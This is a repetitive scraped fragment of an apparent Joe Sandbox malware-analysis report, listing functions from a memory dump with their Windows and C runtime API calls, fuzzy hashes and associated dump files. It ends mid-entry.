Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Bound$DestroyElement
String ID:
API String ID: 3987547017-0
Opcode ID: 2695442036c2e854422084e2386d11f4ba6df855a7209c866b33edc96632abc3
Instruction ID: fd5fcf7af413afc9c86bd766f7eadf820337d1727961e0be5bb5cfb46c890eaa
Opcode Fuzzy Hash: 2695442036c2e854422084e2386d11f4ba6df855a7209c866b33edc96632abc3
Instruction Fuzzy Hash: 74414F75A04149AFDB00DF98C880DAEBBB8FB59354F20856DF919E7740D730EA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E5A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C8E5ACB
__CxxThrowException@8.LIBCMT ref: 6C8E5AE0
std::exception::exception.LIBCMT ref: 6C8E5B18
__CxxThrowException@8.LIBCMT ref: 6C8E5B2D

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc
String ID:
API String ID: 3153320871-0
Opcode ID: 67699072bc4a2fb678a4f402ee9798cd52fa46cbf668efad574513d310b1bfde
Instruction ID: 55649adc5da7cbcc7082b522cb50874219290771b90dfecdd22f0f1dfaa82c9c
Opcode Fuzzy Hash: 67699072bc4a2fb678a4f402ee9798cd52fa46cbf668efad574513d310b1bfde
Instruction Fuzzy Hash: 9331B7B1900708ABDB10DF59D9409DAB7F8FF59714F10C62AE81997F40EB30E904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C918D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C918D8A

Part of subcall function 6C949D66: __FF_MSGBANNER.LIBCMT ref: 6C949D7F
Part of subcall function 6C949D66: __NMSG_WRITE.LIBCMT ref: 6C949D86
Part of subcall function 6C949D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6C949BD4,6C8E1290,65628154), ref: 6C949DAB

Part of subcall function 6C9491F6: std::_Lockit::_Lockit.LIBCPMT ref: 6C949202

_malloc.LIBCMT ref: 6C918DAF
std::exception::exception.LIBCMT ref: 6C918DD4
__CxxThrowException@8.LIBCMT ref: 6C918DEB

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
String ID:
API String ID: 3043633502-0
Opcode ID: f3a326c6b99a1399b6793099f6c23ab8a5d40834e066b4eb14d26ec2155d30d3
Instruction ID: f31d1fe9f15b89399d82a2e4553f4dfc3a147f8add745535bd4c3ec3fc8e54c8
Opcode Fuzzy Hash: f3a326c6b99a1399b6793099f6c23ab8a5d40834e066b4eb14d26ec2155d30d3
Instruction Fuzzy Hash: 10F0F67640431557D310DB669D52BDF32AC9FB6615F45491DF85451E40E720D60CC6B3

Uniqueness

Uniqueness Score: -1.00%

Function 6C949BB5 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C949BCF

Part of subcall function 6C949D66: __FF_MSGBANNER.LIBCMT ref: 6C949D7F
Part of subcall function 6C949D66: __NMSG_WRITE.LIBCMT ref: 6C949D86
Part of subcall function 6C949D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6C949BD4,6C8E1290,65628154), ref: 6C949DAB

std::exception::exception.LIBCMT ref: 6C949C04
std::exception::exception.LIBCMT ref: 6C949C1E
__CxxThrowException@8.LIBCMT ref: 6C949C2F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: 18c587a8243c7824de17e22763b1e1b9b870d09e1003b215432c87a3fc3faac9
Instruction ID: 0f674a0e9bdccdfd4af8ab2a1d5817fca926706e5d0b6b63741787740d929f3a
Opcode Fuzzy Hash: 18c587a8243c7824de17e22763b1e1b9b870d09e1003b215432c87a3fc3faac9
Instruction Fuzzy Hash: 30F0CD315015096EEF00EFA5CD51ADD7ABCEB6371CF254959E40197FD0DB71CA04C650

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F6C60 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6C8F6C73
SafeArrayAccessData.OLEAUT32(00000000,6C8F6C3C), ref: 6C8F6C87
_memmove.LIBCMT ref: 6C8F6C9A
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6C8F6CA3

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
String ID:
API String ID: 3147195435-0
Opcode ID: 5e02897939411372ec02055753714894863419b999aef01f16a28382b0e830e4
Instruction ID: 497115e539e19506c9683527f61b07ed4738618f2f8dfd815e70293d9000299e
Opcode Fuzzy Hash: 5e02897939411372ec02055753714894863419b999aef01f16a28382b0e830e4
Instruction Fuzzy Hash: B8F054753052147BEB109F92DD55F973B6CEF96750F018115F9188E240D670D6009BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C911FD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C912206
__CxxThrowException@8.LIBCMT ref: 6C912221

Part of subcall function 6C916480: __CxxThrowException@8.LIBCMT ref: 6C916518
Part of subcall function 6C916480: __CxxThrowException@8.LIBCMT ref: 6C916558

Strings

ILProtector, xrefs: 6C912045

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw$_mallocstd::exception::exception
String ID: ILProtector
API String ID: 84431791-1153028812
Opcode ID: 573bb7a25305201b22e8b4dc74e3f764b3a944d175cf8983b6672ac6bc4e825a
Instruction ID: f1e4300b1d7b605f04cfd62cbab2dbecaa9a39efd01ab9fafdcfb188665c7920
Opcode Fuzzy Hash: 573bb7a25305201b22e8b4dc74e3f764b3a944d175cf8983b6672ac6bc4e825a
Instruction Fuzzy Hash: CE713975909659DFDB14CFA8C844BDEBBB4FF5A300F1085A9D419A7B40DB30AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F9110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8F913B
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8F915C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6C8F9170
LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C8F9191

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: cb373bd4231fe626e64f802b9d142b711fe6f00e68ea81ceabfcaa193ad3cf8a
Instruction ID: 9b0cc27a24441e9fa5cd679d49038c343d39a88cc925fa10adbbdbab9ca9992a
Opcode Fuzzy Hash: cb373bd4231fe626e64f802b9d142b711fe6f00e68ea81ceabfcaa193ad3cf8a
Instruction Fuzzy Hash: 1F415176900209DFCB14DF99D9848EEBBB4FF49214B20855ED826AB740D730EA05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E5450 Relevance: 4.8, APIs: 3, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::tr1::_Xweak.LIBCPMT ref: 6C8E56D7
std::exception::exception.LIBCMT ref: 6C8E5734
__CxxThrowException@8.LIBCMT ref: 6C8E574B

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8ThrowXweak_mallocstd::exception::exceptionstd::tr1::_
String ID:
API String ID: 2092180293-0
Opcode ID: 9e015ed8a2fa93a6fcce5fd58bce2a5833ac7e0d948babf95ea9e28b549ecd56
Instruction ID: 8fd27485682604398284a42523bbf1d5e17c9389f7717b9002de947bb1a9d755
Opcode Fuzzy Hash: 9e015ed8a2fa93a6fcce5fd58bce2a5833ac7e0d948babf95ea9e28b549ecd56
Instruction Fuzzy Hash: 25A118B5504701CFC720CF25C58099AB7F6BF89714F248F5EE4968BA94E770EA48CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F8E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C8F8E89
LeaveCriticalSection.KERNEL32(?,00000000), ref: 6C8F8EAD
_memset.LIBCMT ref: 6C8F8ED2

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID:
API String ID: 3751686142-0
Opcode ID: 60dedf5c564f7703a148d849b3079ee22fd5775f944c30ed84e109b2014b7d27
Instruction ID: 21626155842fe147902edad0318d68a5c4770291174f5306718b823892f95bb5
Opcode Fuzzy Hash: 60dedf5c564f7703a148d849b3079ee22fd5775f944c30ed84e109b2014b7d27
Instruction Fuzzy Hash: 4751AF70601205DFD714CF59C990E9AB7B6FF4A344F20896DE91A8BB81C731E956CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C903A90 Relevance: 4.6, APIs: 3, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C903B71
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C903B83
SafeArrayDestroy.OLEAUT32(?), ref: 6C903BCF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy
String ID:
API String ID: 3651546500-0
Opcode ID: 0082c32194efab4f6093109352c77bfdbaf7d6548bede45ed68b36dc45dbab31
Instruction ID: 55fc714c746ab2270343ca80f5ea0a42d49b316988b07e67d085c6aab07dbd1b
Opcode Fuzzy Hash: 0082c32194efab4f6093109352c77bfdbaf7d6548bede45ed68b36dc45dbab31
Instruction Fuzzy Hash: 00419C713086019FD701DF29C880E6AF7E9FBE9358F244E0EF894D7690D670E9858B92

Uniqueness

Uniqueness Score: -1.00%

Function 6C9069C0 Relevance: 4.6, APIs: 3, Instructions: 128COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6C906A08
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C906A15
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C906A41

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: ed1110db8ab9d75537fa595b6c95871f04ad35a4f6a412f6eb02dff25f007ca3
Instruction ID: 97c30b43de3269b613126620051366eaac19a8a67689df72ade287f86247988c
Opcode Fuzzy Hash: ed1110db8ab9d75537fa595b6c95871f04ad35a4f6a412f6eb02dff25f007ca3
Instruction Fuzzy Hash: C6412C75601219DFDB00DFA8C881EAF77B8EF5A354F208659E911DB780D735E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FDFB0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6C8FDFF6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C8FE003
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C8FE02F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: 8404d79e6cf67b17199c7acdda9289b3a8f835adc6cdd02fcfa9ef02bbf10333
Instruction ID: fadb0c258f1b68f39a3a69a23d996f794c61a030623f7f1cd2d2240e1b8796c4
Opcode Fuzzy Hash: 8404d79e6cf67b17199c7acdda9289b3a8f835adc6cdd02fcfa9ef02bbf10333
Instruction Fuzzy Hash: D4413C71A01209DFCB10DF98C9C4EAEB7B9FB89354B204A69E535E7790D731A942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FD920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6C8FD949
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6C8FD96C
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C8FD9CF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 21679e93fb7b9c602e8c0d500d036c564b6d595adb60beaeb9fec35f6ef6f599
Instruction ID: 87582b6aa9770718ff67c72e94af91c14050d02b33551aa58aeb5e5e858bb4de
Opcode Fuzzy Hash: 21679e93fb7b9c602e8c0d500d036c564b6d595adb60beaeb9fec35f6ef6f599
Instruction Fuzzy Hash: E321AE31301215AFEB11CF99C980FAB77E8EF8A744F204499EA54DB284D771E902DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C90DB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C90DB2D
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6C90DB45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C90DBA2

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: e22f523b1d382e09b2604ae60883a0d75f52eb4805fd4cd1e3ddba1da32bd53a
Instruction ID: f6866f20fb8d103b85e6cc9fd231da7abc7d04ccf8ed8b5babafc0a0af1d2a58
Opcode Fuzzy Hash: e22f523b1d382e09b2604ae60883a0d75f52eb4805fd4cd1e3ddba1da32bd53a
Instruction Fuzzy Hash: 60115E76745205AFE700DF69C888FAABBB8BF5A314F15815DE9089B341D730E915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C913EB0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

std::exception::exception.LIBCMT ref: 6C914042

Part of subcall function 6C949533: std::exception::_Copy_str.LIBCMT ref: 6C94954E

__CxxThrowException@8.LIBCMT ref: 6C914059

